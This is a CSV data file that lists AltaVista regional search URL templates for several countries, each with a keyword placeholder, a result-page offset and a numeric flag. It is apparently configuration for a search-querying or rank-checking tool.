"International","Altavista AU 4 (Next 50)","http://au.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista AU 5 (Next 50)","http://au.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","1"
"International","Altavista AU 5 (Next 50)","http://au.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista AU 5 (Next 50)","http://au.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista AU 5 (Next 50)","http://au.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista AU 5 (Next 50)","http://au.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista AU 5 (Next 50)","http://au.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista BE","http://be.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","1"
"International","Altavista BE","http://be.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista BE","http://be.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista BE","http://be.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista BE","http://be.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista BE","http://be.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista BE 2 (Next 50)","http://be.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","1"
"International","Altavista BE 2 (Next 50)","http://be.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista BE 2 (Next 50)","http://be.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista BE 2 (Next 50)","http://be.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista BE 2 (Next 50)","http://be.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista BE 2 (Next 50)","http://be.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista BE 3 (Next 50)","http://be.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista BE 3 (Next 50)","http://be.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista BE 3 (Next 50)","http://be.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista BE 3 (Next 50)","http://be.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista BE 3 (Next 50)","http://be.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista BE 3 (Next 50)","http://be.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista BE 4 (Next 50)","http://be.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista BE 4 (Next 50)","http://be.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista BE 4 (Next 50)","http://be.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista BE 4 (Next 50)","http://be.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista BE 4 (Next 50)","http://be.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista BE 4 (Next 50)","http://be.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista BE 5 (Next 50)","http://be.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","1"
"International","Altavista BE 5 (Next 50)","http://be.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista BE 5 (Next 50)","http://be.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista BE 5 (Next 50)","http://be.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista BE 5 (Next 50)","http://be.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista BE 5 (Next 50)","http://be.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista Br","http://br.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","1"
"International","Altavista Br","http://br.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista Br","http://br.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista Br","http://br.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista Br","http://br.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista Br","http://br.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista Br 2 (Next 50)","http://br.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","1"
"International","Altavista Br 2 (Next 50)","http://br.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista Br 2 (Next 50)","http://br.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista Br 2 (Next 50)","http://br.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista Br 2 (Next 50)","http://br.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista Br 2 (Next 50)","http://br.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista Br 3 (Next 50)","http://br.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","1"
"International","Altavista Br 3 (Next 50)","http://br.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista Br 3 (Next 50)","http://br.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista Br 3 (Next 50)","http://br.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista Br 3 (Next 50)","http://br.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista Br 3 (Next 50)","http://br.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista Br 4 (Next 50)","http://br.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","1"
"International","Altavista Br 4 (Next 50)","http://br.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista Br 4 (Next 50)","http://br.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista Br 4 (Next 50)","http://br.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista Br 4 (Next 50)","http://br.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista Br 4 (Next 50)","http://br.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista Br 5 (Next 50)","http://br.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","1"
"International","Altavista Br 5 (Next 50)","http://br.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista Br 5 (Next 50)","http://br.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista Br 5 (Next 50)","http://br.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista Br 5 (Next 50)","http://br.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista Br 5 (Next 50)","http://br.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista CA","http://ca-en.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","1"
"International","Altavista CA","http://ca-en.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista CA","http://ca-en.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista CA","http://ca-en.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista CA","http://ca-en.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista CA","http://ca-en.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista CA 2 (Next 50)","http://ca-en.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","1"
"International","Altavista CA 2 (Next 50)","http://ca-en.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista CA 2 (Next 50)","http://ca-en.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista CA 2 (Next 50)","http://ca-en.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista CA 2 (Next 50)","http://ca-en.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista CA 2 (Next 50)","http://ca-en.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista CA 3 (Next 50)","http://ca-en.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","1"
"International","Altavista CA 3 (Next 50)","http://ca-en.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista CA 3 (Next 50)","http://ca-en.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista CA 3 (Next 50)","http://ca-en.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista CA 3 (Next 50)","http://ca-en.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista CA 3 (Next 50)","http://ca-en.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista CA 4 (Next 50)","http://ca-en.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","1"
"International","Altavista CA 4 (Next 50)","http://ca-en.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista CA 4 (Next 50)","http://ca-en.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista CA 4 (Next 50)","http://ca-en.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista CA 4 (Next 50)","http://ca-en.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista CA 4 (Next 50)","http://ca-en.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista CA 5 (Next 50)","http://ca-en.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","1"
"International","Altavista CA 5 (Next 50)","http://ca-en.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista CA 5 (Next 50)","http://ca-en.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista CA 5 (Next 50)","http://ca-en.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista CA 5 (Next 50)","http://ca-en.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista CA 5 (Next 50)","http://ca-en.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista CH","http://ch.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","1"
"International","Altavista CH","http://ch.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista CH","http://ch.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista CH","http://ch.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista CH","http://ch.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista CH","http://ch.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista CH 2 (Next 50)","http://ch.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","1"
"International","Altavista CH 2 (Next 50)","http://ch.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista CH 2 (Next 50)","http://ch.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista CH 2 (Next 50)","http://ch.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista CH 2 (Next 50)","http://ch.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista CH 2 (Next 50)","http://ch.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista CH 3 (Next 50)","http://ch.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","1"
"International","Altavista CH 3 (Next 50)","http://ch.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista CH 3 (Next 50)","http://ch.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista CH 3 (Next 50)","http://ch.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista CH 3 (Next 50)","http://ch.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista CH 3 (Next 50)","http://ch.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista CH 4 (Next 50)","http://ch.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","1"
"International","Altavista CH 4 (Next 50)","http://ch.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista CH 4 (Next 50)","http://ch.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista CH 4 (Next 50)","http://ch.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista CH 4 (Next 50)","http://ch.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista CH 4 (Next 50)","http://ch.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista CH 5 (Next 50)","http://ch.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","1"
"International","Altavista CH 5 (Next 50)","http://ch.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista CH 5 (Next 50)","http://ch.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista CH 5 (Next 50)","http://ch.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista CH 5 (Next 50)","http://ch.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista CH 5 (Next 50)","http://ch.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista DE","http://de.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","1"
"International","Altavista DE","http://de.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista DE","http://de.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista DE","http://de.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista DE","http://de.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista DE","http://de.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista DE 2 (Next 50)","http://de.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","1"
"International","Altavista DE 2 (Next 50)","http://de.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista DE 2 (Next 50)","http://de.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista DE 2 (Next 50)","http://de.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista DE 2 (Next 50)","http://de.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista DE 2 (Next 50)","http://de.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista DE 3 (Next 50)","http://de.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","1"
"International","Altavista DE 3 (Next 50)","http://de.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista DE 3 (Next 50)","http://de.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista DE 3 (Next 50)","http://de.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista DE 3 (Next 50)","http://de.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista DE 3 (Next 50)","http://de.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista DE 4 (Next 50)","http://de.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","1"
"International","Altavista DE 4 (Next 50)","http://de.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista DE 4 (Next 50)","http://de.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista DE 4 (Next 50)","http://de.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista DE 4 (Next 50)","http://de.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista DE 4 (Next 50)","http://de.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista DE 5 (Next 50)","http://de.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","1"
"International","Altavista DE 5 (Next 50)","http://de.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista DE 5 (Next 50)","http://de.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista DE 5 (Next 50)","http://de.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista DE 5 (Next 50)","http://de.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista DE 5 (Next 50)","http://de.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista DK","http://dk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","1"
"International","Altavista DK","http://dk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista DK","http://dk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista DK","http://dk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista DK","http://dk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista DK","http://dk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista DK 2 (Next 50)","http://dk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","1"
"International","Altavista DK 2 (Next 50)","http://dk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista DK 2 (Next 50)","http://dk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista DK 2 (Next 50)","http://dk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista DK 2 (Next 50)","http://dk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista DK 2 (Next 50)","http://dk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista DK 3 (Next 50)","http://dk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","1"
"International","Altavista DK 3 (Next 50)","http://dk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista DK 3 (Next 50)","http://dk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista DK 3 (Next 50)","http://dk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista DK 3 (Next 50)","http://dk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista DK 3 (Next 50)","http://dk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
